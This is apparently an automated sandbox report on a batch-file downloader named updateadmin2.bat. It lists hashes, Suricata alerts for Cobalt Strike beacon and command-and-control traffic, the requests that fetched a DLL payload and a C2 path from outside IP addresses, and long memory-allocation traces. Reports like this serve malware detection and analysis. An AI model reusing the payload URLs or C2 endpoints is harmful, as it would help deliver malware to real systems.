Summary | ZeroBOX

updateadmin2.bat

Generic Malware UPX Malicious Library Malicious Packer Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential AntiDebug PE64 AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 1, 2021, 10:56 a.m. Nov. 1, 2021, 11:12 a.m.
Size 450.0B
Type DOS batch file, ASCII text
MD5 8a8a26331aea7126ede07c9988343045
SHA256 0012ab676b84e8762edba4994f0887b0a04d47ce81e286fabb978af3491a8874
CRC32 C54D31DF
ssdeep 6:enyszV7kiKGBHLYeptILx4nyLmZ5LP0zmKtCIXUlWanyLmZ5LP0zmKtCIXUIvRpW:enN7ntBzn7LPwPYjlWan7LPwPYjd
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
nutsstats.com
IP Address Status Action
108.62.12.61 Active Moloch
164.124.101.2 Active Moloch
194.5.212.190 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 194.5.212.190:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 194.5.212.190:80 -> 192.168.56.103:49171 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.5.212.190:80 -> 192.168.56.103:49171 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49192 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49192 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49186 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49186 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49204 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49204 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49202 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49202 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49207 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49190 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49207 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49190 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49209 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49191 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49209 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49191 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49195 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49210 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49195 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49210 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49197 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49197 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49199 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49199 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49193 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49193 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49189 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49200 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49189 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49200 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49201 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49201 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49194 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49194 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49205 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49205 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49196 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49196 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49206 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49206 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49198 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49198 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49203 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49203 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49211 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49211 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 192.168.56.103:49208 -> 108.62.12.61:99 2033658 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 Malware Command and Control Activity Detected
TCP 192.168.56.103:49208 -> 108.62.12.61:99 2033928 ET MALWARE Cobalt Strike Beacon Activity (GET) A Network Trojan was detected
TCP 108.62.12.61:99 -> 192.168.56.103:49196 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49195 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49194 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49190 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49200 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49202 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49207 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49186 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49192 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49189 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49184 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49208 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49211 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49206 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49203 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49193 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49198 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49201 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49205 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49204 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49191 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49197 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49199 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49209 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected
TCP 108.62.12.61:99 -> 192.168.56.103:49210 2033009 ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0051d1e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0051d760
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0051d2e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0051d660
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0051d2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0051cee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0051db60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f038
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029f178
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0029e8f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://194.5.212.190/load/trendmicro2.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://108.62.12.61/home2
request GET http://194.5.212.190/load/trendmicro2.dll
request GET http://108.62.12.61/home2
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 160
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02780000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c51000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01efa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c52000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ef2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02781000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02782000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0240b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02407000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01efb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02405000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f45000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02810000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0240c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
